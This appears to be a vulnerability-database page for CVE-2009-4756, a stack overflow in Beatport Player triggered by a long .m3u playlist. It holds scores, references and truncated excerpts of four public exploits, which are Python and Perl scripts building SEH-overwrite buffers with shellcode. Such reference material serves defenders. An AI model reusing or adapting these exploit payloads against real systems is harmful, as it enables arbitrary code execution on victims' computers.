CVE-2009-4756
published 2010-03-29CVE-2009-4756: Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.91%
93.3th percentile
Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beatport | beatport_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
---
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
---
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
---
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)
Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)
---
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars=
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/8588http://www.exploit-db.com/exploits/8590http://www.exploit-db.com/exploits/8591http://www.exploit-db.com/exploits/8592http://www.securityfocus.com/bid/34793https://exchange.xforce.ibmcloud.com/vulnerabilities/50267http://www.exploit-db.com/exploits/8588http://www.exploit-db.com/exploits/8590http://www.exploit-db.com/exploits/8591http://www.exploit-db.com/exploits/8592http://www.securityfocus.com/bid/34793https://exchange.xforce.ibmcloud.com/vulnerabilities/50267
2010-03-29
Published